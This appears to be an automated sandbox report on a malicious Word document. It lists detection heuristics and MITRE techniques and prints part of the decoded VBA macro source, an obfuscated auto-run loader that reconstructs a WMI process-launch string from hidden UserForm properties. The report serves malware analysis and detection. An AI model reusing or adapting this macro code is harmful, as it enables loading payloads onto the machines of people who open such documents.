MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of malicious intent. The presence of a ClamAV detection for 'Doc.Malware.Sagent-9403571-0' further supports this. The primary function appears to be executing obfuscated VBA code that likely downloads and executes a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.Sagent-9403571-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-9403571-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15341 bytes |
SHA-256: 02acc1db2c4fa37db6fc1b6af6686e0f3a4431258401bb6e34f334fb12fc7357 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "A_gft0khts2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Z9mr73gwc6ug8a.M_gscuvkdietfxvevz
End Sub
Attribute VB_Name = "Z9mr73gwc6ug8a"
Attribute VB_Base = "0{EBC107FD-DB16-42DB-BA20-A81B22A24570}{AC968F29-200E-4CE1-B031-C421FEF98F74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function M_gscuvkdietfxvevz()
Tn83v37dzlbs877ka = "490"
If Len("Vyv6zkj17htyfi1_Jwh_9yc1ugar") = Len("Q7r7x0i7yws68z") + 1 Then End
If Len("Ag5391ty4z8_tefGjsuxgjv33kzSeb0rznnitydhzh201") < Len("Nsjwoe968iagp6zdv") Then
MsgBox "Abq33a15rqsc65btgs" + "Nx6t5reinijtvx"
MsgBox ("Xyl21i7vysm6ohe8y")
MsgBox "Rbjgtwly4mvh" + "Xq_8oiq4hxbhasw1bj"
End If
If Len("Pn9vw2fzpbqtaPqpok1zinqph_s") = Len("S93diwu_6ogj") Then
MsgBox "A23eb2pbhl2uyo_" + "Ep2yu1eyq36bqu"
MsgBox ("Drfhxzkfjcc !!!")
MsgBox "Pauviutz_pw0kxd" + "H8owxlxdsgn37jsv"
End If
Pvgwpf9dz6t4ngr4 = Z9mr73gwc6ug8a.HelpContextId + 50 + 50
Ihiqcukgbl3 = "758"
If Len("S57f63b34dbri435vJ4dq29hlb2xt29g") = Len("Pqsbowdfiif3ik") + 1 Then End
If Len("Lwr0_2jd09u1lfjneVhmmtg2z0is3qT0h9j0gxlnu") < Len("V74a07brndq") Then
MsgBox "Bkik4bvgrq_" + "Ymdfeh7_4pm67"
MsgBox ("Gx2_1ysd6_285j3oxo")
MsgBox "Lcw38mghrly9oo640p" + "Sl56sdoioxho39"
End If
If Len("L7x66xurb3gbms0r50Rwwieyse4uk8") = Len("Zr0_gdv6g64clcb2pf") Then
MsgBox "Lxkm5ytgmt3837" + "B7t_l1nks25f4"
MsgBox ("Lnop7rk1eely8il !!!")
MsgBox "Ybhb_ghp6ycm3v" + "N1v8gos7oam"
End If
U03so10k56k09a04 = ChrW(Pvgwpf9dz6t4ngr4 + (15))
W1r45cowf207m = "80"
If Len("Joqvi47i_n1fMt49jhu7snetxnw") = Len("Fa2zhvjusfpox1") + 1 Then End
If Len("Czq8dn4zy3mAlcwqk54n0qo8kiqdEj3ib5grtcold871i") < Len("Ku_e493fic_5") Then
MsgBox "Jv7wcd4kip02" + "Kb6utgb_bu5cq5r7v"
MsgBox ("Mz9b2hl4wp0g")
MsgBox "Anbu2kzt53gl" + "Buwkloxksc6"
End If
If Len("Hyj1vxa6p5zpkP8vy822zf2gmeut6") = Len("Hhhqxp4iffrxi6") Then
MsgBox "Au52z6fdwvss" + "Gsqlulohcl0s3p3"
MsgBox ("Hc980mu24gxfew6 !!!")
MsgBox "Xjay1fd8qa9j" + "G8qormtuwv891tozj"
End If
Us73fr0esajusj58d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + U03so10k56k09a04 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Z9mr73gwc6ug8a.Lvx1_0xpifn7q + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
Dhk6mo8sk3ja = "629"
If Len("N586grcb4bfbvdgzv3Miy6ouz7z1i37wud") = Len("Bjkbogmge42") + 1 Then End
If Len("S51awt170slrvIukjqa_gxlrxecRj20v08s2kc6i") < Len("N04ra5386n2") Then
MsgBox "Ogpu_pxtkjvt_" + "Lct_nf3ednygdi"
MsgBox ("Uonhko1dhlxhz3k")
MsgBox "Hrvo1n7_vtqdc" + "Vlp0s6hmza20my29cn"
End If
If Len("Zozt66ptow30walslSkqg93ux2bijyrdkd") = Len("C4udcm519ce9ag") Then
MsgBox "Dmcn5r90heoke0" + "Wm96otjwhemi5"
MsgBox ("N4ac6sea9jah5m !!!")
MsgBox "Rbz2xh4ag37717irid" + "Rlnikqg6oy5hz8"
End If
Cihc5veidv3usj = Dsiiu606aot2n2c0j(Us73fr0esajusj58d)
Hif19mrs13xk = "253"
If Len("O_ahgzf56eryxzrlrSfg7vwgiwc_itgs9f") = Len("A7fu4mpezcly_hi89") + 1 Then End
If Len("Pypob9dd6xvlRt
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.